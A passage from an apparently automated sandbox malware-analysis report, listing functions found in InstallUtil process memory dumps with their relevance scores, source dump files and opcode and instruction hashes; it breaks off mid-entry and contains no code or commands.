                                                                  • Instruction Fuzzy Hash: 14A11827A092250AD708B7BCB4B69EA3B50DF41334B4885B7D5DD8E0E7DE1874C687C5
                                                                  Function 00007FFD9B8ED79D Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I$L6_H
                                                                  • API String ID: 0-433358173
                                                                  • Opcode ID: 8ea4374b1bd7812638d1f1606fc2206c0fcba1ec01ebbb6f9a955c3cf288e247
                                                                  • Instruction ID: 6f10f206944a7c4607db7d3717ddc26177c0222cdb22cfb21682e339d5af42d8
                                                                  • Opcode Fuzzy Hash: 8ea4374b1bd7812638d1f1606fc2206c0fcba1ec01ebbb6f9a955c3cf288e247
                                                                  • Instruction Fuzzy Hash: 1A11E57190F3C89FDB16AB7488A54987FB0EF5A240B4A01FBC485CB1B3EA29594AC301
                                                                  Function 00007FFD9B8E3F8F Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 4d7e1836ca0b7443bb9534a120bf3623b6e4bc3515be93164aa867d5cdea269e
                                                                  • Instruction ID: 5a2dae157f6cdf94f382b4ad31eb0489d3f2d1c772ca74336d5a1649cdc3ec93
                                                                  • Opcode Fuzzy Hash: 4d7e1836ca0b7443bb9534a120bf3623b6e4bc3515be93164aa867d5cdea269e
                                                                  • Instruction Fuzzy Hash: 0801F57170E2954FD725EB7C88689947FA0EF1A22074946A9C095CB1B3EE189889C744
                                                                  Function 00007FFD9B771D79 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 3
                                                                  • API String ID: 0-1842515611
                                                                  • Opcode ID: 9ae6c9fe67c43da4873d3513c2a28b04855faf14caf14dba4977a608571029ef
                                                                  • Instruction ID: dce3f188942bd34d0e4fcefc1b390d9ae72c68826efc3f4c1b4e0897d1214ac6
                                                                  • Opcode Fuzzy Hash: 9ae6c9fe67c43da4873d3513c2a28b04855faf14caf14dba4977a608571029ef
                                                                  • Instruction Fuzzy Hash: 8461C422F5E38E0FE7298AB858D54B03BD0DF56215B1A02FEC49ACB5F3D8A859434741
                                                                  Function 00007FFD9B8EB2B1 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 9531ee8687609ee3a8a846341893ac8da641fc66d75d9068319c20254a96954a
                                                                  • Instruction ID: 30d25dba1c2a413eb61a550a6c9211e2d3d652331c614608b5895ae4e5d93946
                                                                  • Opcode Fuzzy Hash: 9531ee8687609ee3a8a846341893ac8da641fc66d75d9068319c20254a96954a
                                                                  • Instruction Fuzzy Hash: 1B51D771A0E78D4FD756EBB888A95A87BE1EF5A310B0502FBC449CB1F3DE285946C701
                                                                  Function 00007FFD9B8E3080 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: 6b696d4376fdb648aef7ce0701493d12d175251d99dcdfc6cfe5e2dca0b2e683
                                                                  • Instruction ID: ecfcd6a2283b52641b45c7bb62013e261e2c9c4f54c08c61abee4e0f5138d3bc
                                                                  • Opcode Fuzzy Hash: 6b696d4376fdb648aef7ce0701493d12d175251d99dcdfc6cfe5e2dca0b2e683
                                                                  • Instruction Fuzzy Hash: BC318B7094E3CA5FD7179BB488745947FF0AF47220B0A41EBC088CB0B3D65C598AC762
                                                                  Function 00007FFD9B8E99A1 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: 8cd17a08c82d3bb8c2dd9c783104579ff9b99802aa46676e1e57fb6488b3367a
                                                                  • Instruction ID: 95b7ad98f2891f4e97bac3f7a251f8ca0000fbd2053bd77510cbdf74f6bdc815
                                                                  • Opcode Fuzzy Hash: 8cd17a08c82d3bb8c2dd9c783104579ff9b99802aa46676e1e57fb6488b3367a
                                                                  • Instruction Fuzzy Hash: 68319E6184F3C58FC713AB7888B95957FB0AE57214B0A45EFC0D5CB0A3E65C195AC712
                                                                  Function 00007FFD9B8EC68D Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 301fa873b4806d4b61411c828f1ff5c59ca55887c7e072093a328d084c97fd85
                                                                  • Instruction ID: 6e22e7e2d5c0b69cfe9202e3a48798ae482d5ba6c763a595decc20c528e0e991
                                                                  • Opcode Fuzzy Hash: 301fa873b4806d4b61411c828f1ff5c59ca55887c7e072093a328d084c97fd85
                                                                  • Instruction Fuzzy Hash: A121F63194F3895FD716AB74886A4E67FB0EF16210B0642EBC049CB0B3DA1D5686C741
                                                                  Function 00007FFD9B8E2CFC Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: fbb8cdd3681d9f3ce5475974c82ab06150d7b5f60b55c164b20f50dede07dbaa
                                                                  • Instruction ID: 2c2cd404af699553005572995d131d067bfc1d84a4f1b6579ea60a8b7a83234c
                                                                  • Opcode Fuzzy Hash: fbb8cdd3681d9f3ce5475974c82ab06150d7b5f60b55c164b20f50dede07dbaa
                                                                  • Instruction Fuzzy Hash: F821C521A4F3C94FD717ABB488655947FF0EF17250F4A41EBC084CB0B3D968594AC712
                                                                  Function 00007FFD9B8E83DD Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 83d972b1215800df24cdb8214446976ec2157c7a06fe5aeb721cd6b55ef84eb3
                                                                  • Instruction ID: 7de3f0b81701f73417c0f87bdc43da37cd34f5f73dd4e83dfb350a9a108400f2
                                                                  • Opcode Fuzzy Hash: 83d972b1215800df24cdb8214446976ec2157c7a06fe5aeb721cd6b55ef84eb3
                                                                  • Instruction Fuzzy Hash: 0D213B31B096494FD725FB7894694A87BF0FF09200B4641FBD009C71E7EE299D86C741
                                                                  Function 00007FFD9B8E7FFC Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: a1016208978ee26bae398331c310ac03087f5cfc1df6c8ea1df9d38564584a0a
                                                                  • Instruction ID: 2fe7c48d89f768e25d5d31a7cedcbc28ca6ac5ac40418784748b3cc9cc7713b7
                                                                  • Opcode Fuzzy Hash: a1016208978ee26bae398331c310ac03087f5cfc1df6c8ea1df9d38564584a0a
                                                                  • Instruction Fuzzy Hash: 3711083194E7C98FE716EB7848594997FE0FF16250B0542FBC485CB0E3EE28A586C751
                                                                  Function 00007FFD9B8E6601 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: bb5696170ad314308060686921e6212764cf92fd666f4a6c38a85efd7bca3bf1
                                                                  • Instruction ID: 870c7ea0b485d6af9d96f3abc04fdc0bf53f88a47da0e22ed42347137ce9e0bc
                                                                  • Opcode Fuzzy Hash: bb5696170ad314308060686921e6212764cf92fd666f4a6c38a85efd7bca3bf1
                                                                  • Instruction Fuzzy Hash: 32113A7090F7C94FD716AB7888644987FB0FF56200B4A02EFC095CB0B3EE295946C301
                                                                  Function 00007FFD9B8E7581 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 50957ae41523f77981e7bdafce3544e7837ab47a73c8ff7c80253d48d236b129
                                                                  • Instruction ID: 00e0ade573076f9fb479abd9a5ef670a023e04c7f440fcfaec4cf6c01b11ff7f
                                                                  • Opcode Fuzzy Hash: 50957ae41523f77981e7bdafce3544e7837ab47a73c8ff7c80253d48d236b129
                                                                  • Instruction Fuzzy Hash: BF11E731A0E7C94FD756EB7888694987FB0FF16200B1A42EFC455CB1A3EA289985C741
                                                                  Function 00007FFD9B8EB9B1 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 802a7ff894a1a97c48dbfdd632ce60eeafe7511a7763c4c9ad79a85cb24b5184
                                                                  • Instruction ID: e04bfeb47e595c1139dc921115cde8fc3c1aa4bb7713277cdd5a1d48bbfc3056
                                                                  • Opcode Fuzzy Hash: 802a7ff894a1a97c48dbfdd632ce60eeafe7511a7763c4c9ad79a85cb24b5184
                                                                  • Instruction Fuzzy Hash: DF11E77194F7C84FD716AB7848694987FB0EF56200B4A41EBD085CB1B3EA295999C701
                                                                  Function 00007FFD9B8E948D Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 00ea0a7b14576caab86cd1240263b4b818a9f757007adff799eab03b1fa667f4
                                                                  • Instruction ID: 2279abb8800968aae696e110e7cb129c8300188577573bcd124aee1655411c3c
                                                                  • Opcode Fuzzy Hash: 00ea0a7b14576caab86cd1240263b4b818a9f757007adff799eab03b1fa667f4
                                                                  • Instruction Fuzzy Hash: 59110B3190F7C94FD756AB7484694A87FF0FF1A210B0A45FBC449CB1A3EA799945C701
                                                                  Function 00007FFD9B8E3C38 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: a666b37afd1627fb1471d0faab25d97b1e76afefb2803ca9dc25a4633b691d57
                                                                  • Instruction ID: db06cb79dcccbfd490fbcedcd102140702e0ad9afbc1e0d2719982358e91cc49
                                                                  • Opcode Fuzzy Hash: a666b37afd1627fb1471d0faab25d97b1e76afefb2803ca9dc25a4633b691d57
                                                                  • Instruction Fuzzy Hash: 7411913194E7C89FD756EBB488699987FF0EF5B210B4A41EEC489CB0B3DA2C9945C701
                                                                  Function 00007FFD9B8EE671 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: ecbe0c4ab51df4668d9b1d05a02cc59d71429e0b17a723568a1210b63159ddf7
                                                                  • Instruction ID: e8ca92bd0c1394217f03145f1a2f0ebdfbae5a2c1860b4b9e6106c4897378611
                                                                  • Opcode Fuzzy Hash: ecbe0c4ab51df4668d9b1d05a02cc59d71429e0b17a723568a1210b63159ddf7
                                                                  • Instruction Fuzzy Hash: 5C11E37194F3C88FD756EB74C8694957FA0EF06310B4A41EFD089CB0B3DA59598AC312
                                                                  Function 00007FFD9B772629 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: c#
                                                                  • API String ID: 0-143056266
                                                                  • Opcode ID: 9c0b82ea17278202bf965ec178526c162987fdcc48c39f903a3908c398399a76
                                                                  • Instruction ID: 8759778da97ba856be6defcbe0bd842052d092fbd9b01a574561f39c54f864ac
                                                                  • Opcode Fuzzy Hash: 9c0b82ea17278202bf965ec178526c162987fdcc48c39f903a3908c398399a76
                                                                  • Instruction Fuzzy Hash: 7B01B522B0B6490FDB55EBBC98A55B937D2DF8634070A42B5E409CB2B3DD58AE424700
                                                                  Function 00007FFD9B8E572D Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: a73ab7bc50f966939317e39cbf0379bba7d5886a3c9fcb609be5dc87c4a52306
                                                                  • Instruction ID: 4a48028fa964273352709b2430b25a812aaa657dffcaa59689a6b846d4b49eb0
                                                                  • Opcode Fuzzy Hash: a73ab7bc50f966939317e39cbf0379bba7d5886a3c9fcb609be5dc87c4a52306
                                                                  • Instruction Fuzzy Hash: 8311EC31A0E7898FDB15EB7484A94D87FB0FF56200B4642FFC445C7063EA299945C741
                                                                  Function 00007FFD9B7701CD Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: _
                                                                  • API String ID: 0-701932520
                                                                  • Opcode ID: fd57a029cf9595c6ec3a032f876145a03f345ef79dea2c61beaf5e4c49e3ea73
                                                                  • Instruction ID: f2a7b692067b0054f0622ee4ee5fb407974e5ea1893cf5a8331d154e975c851f
                                                                  • Opcode Fuzzy Hash: fd57a029cf9595c6ec3a032f876145a03f345ef79dea2c61beaf5e4c49e3ea73
                                                                  • Instruction Fuzzy Hash: A4014512B0EAE90AFB74956C54B467C7AD1EF41660F0902FBD098CB4F7D889DE858381
                                                                  Function 00007FFD9B7725B0 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: c#
                                                                  • API String ID: 0-143056266
                                                                  • Opcode ID: e3caadf52d70b970807d7424631e9147fd295631090e7619d7111c97eacbd21e
                                                                  • Instruction ID: 8d8bbcc3d0f00d45bb45e4c62b412afbf6475d2a2e93f32bed8606969833b08f
                                                                  • Opcode Fuzzy Hash: e3caadf52d70b970807d7424631e9147fd295631090e7619d7111c97eacbd21e
                                                                  • Instruction Fuzzy Hash: 3C012122B0690D4FDB95E76C94A86B833D2EF9874174601B1E409CB3B3ED65AD424700
                                                                  Function 00007FFD9B8E1DF9 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: &,_^
                                                                  • API String ID: 0-616213778
                                                                  • Opcode ID: 13d0be6ae70a93f2a03f23530ca48b57406e1ef4032e47b01b64ed61d215af03
                                                                  • Instruction ID: e51c3c68fd64e030919dafd451672a65577d69de53d8ff5268517e9843dc328a
                                                                  • Opcode Fuzzy Hash: 13d0be6ae70a93f2a03f23530ca48b57406e1ef4032e47b01b64ed61d215af03
                                                                  • Instruction Fuzzy Hash: D4E02631B16A0D5BCB1DB62C4C69430B3D1FB7DA01788527AD009C73D2EC15EDC68781
                                                                  Function 00007FFD9B8ED3AA Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2969995620.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b8e0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 548bbdfb667f27240260e9137bde7a81566f4d1d841a2858341b2270541e405d
                                                                  • Instruction ID: 19be01a2a734a60143851eeaf4d084e03abd3499819f4693ff0fe29f66d22464
                                                                  • Opcode Fuzzy Hash: 548bbdfb667f27240260e9137bde7a81566f4d1d841a2858341b2270541e405d
                                                                  • Instruction Fuzzy Hash: A0E0CD707075554FDB1CFA7984588247B90EF6534134443EDC446CF197ED28D4C5C710
                                                                  Function 00007FFD9B840F70 Relevance: .9, Instructions: 852COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2966865821.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b840000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2eabdd6d77dc9c8ec37b95fb1c8a6805dcd2cd318c614fadbb88ca62a99b52bd
                                                                  • Instruction ID: 9828cba346d208b7f1c47f905ea4e630ad9c15f63b7961c6833d66ca6183d544
                                                                  • Opcode Fuzzy Hash: 2eabdd6d77dc9c8ec37b95fb1c8a6805dcd2cd318c614fadbb88ca62a99b52bd
                                                                  • Instruction Fuzzy Hash: 1532B122B1EE4E1AE7F5A76C44712356AC3EFDC250B9A01BAD45DC32F6ED29ED064340
                                                                  Function 00007FFD9B841761 Relevance: .6, Instructions: 614COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2966865821.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b840000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 13c50096b21a26078da0ff8b275cd4dc8905c89d6f469e589046ac75d0268757
                                                                  • Instruction ID: f8d3c60d76b3ba02b44835dd61ab6b70159aedcf16ff6d4a0c6dc5aebe4daa51
                                                                  • Opcode Fuzzy Hash: 13c50096b21a26078da0ff8b275cd4dc8905c89d6f469e589046ac75d0268757
                                                                  • Instruction Fuzzy Hash: 90028121B1EA1E1BEAF6B7AC14712792AC3EF9D250B5601BED40DC72F2DD1DAA064241
                                                                  Function 00007FFD9B843E33 Relevance: .4, Instructions: 442COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2966865821.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b840000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6a05651c9f874a6ea0effc853dcf1dc0e8214a64852adae68fb15fe4957906c8
                                                                  • Instruction ID: 330ae0a8f1058f466a3a87ef24e7df95cf972748f1617b9c9d1841ca44e1eaf1
                                                                  • Opcode Fuzzy Hash: 6a05651c9f874a6ea0effc853dcf1dc0e8214a64852adae68fb15fe4957906c8
                                                                  • Instruction Fuzzy Hash: 14C13721B1EE1F5AEAFAA7AC047127D61D3EFDC250B660279D01EC72F6DD1DAB024241
                                                                  Function 00007FFD9B7720E3 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6d018b680617862b727bf9ed5b4b7f595190457aa742dc2b5d1023efa33afe9a
                                                                  • Instruction ID: a76e317813c0a7ca4766a82a5ebc747dc558be2189e95ad314950fdd451076a9
                                                                  • Opcode Fuzzy Hash: 6d018b680617862b727bf9ed5b4b7f595190457aa742dc2b5d1023efa33afe9a
                                                                  • Instruction Fuzzy Hash: CEA1B430B1991D8FDB58EB98D8A5ABC73E2FF94310B154279E019D72E6CE35AC41C780
                                                                  Function 00007FFD9B7738D0 Relevance: .3, Instructions: 280COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 41e1b04caf86b41b5df23ba60ef3691f6e754ee081bea13d08a2691cf2ae13e4
                                                                  • Instruction ID: 9ded10c682cd3c5759dab8e8d54b100e0b8f04d068d54afe294c5974d61104a3
                                                                  • Opcode Fuzzy Hash: 41e1b04caf86b41b5df23ba60ef3691f6e754ee081bea13d08a2691cf2ae13e4
                                                                  • Instruction Fuzzy Hash: EF915B71A0EB494FD719EB78C496669BBE1FF55314B2102BED04AC71F3DA35A5028740
                                                                  Function 00007FFD9B772DD5 Relevance: .2, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4bc113ea022a7b4d478cadbdf276e966e5bb4d40a75d4bd18e34099461ea22ec
                                                                  • Instruction ID: c9740ac3739c76f939c9202aa4e9a23a544332274468be36c4cbed155c2855e9
                                                                  • Opcode Fuzzy Hash: 4bc113ea022a7b4d478cadbdf276e966e5bb4d40a75d4bd18e34099461ea22ec
                                                                  • Instruction Fuzzy Hash: 1781A37060AB4A8FDBA8CF58C8A496537A1FF49314B11466DE82DC73E2CB75E912CB40
                                                                  Function 00007FFD9B7701C8 Relevance: .2, Instructions: 206COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2963069385.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd9b770000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
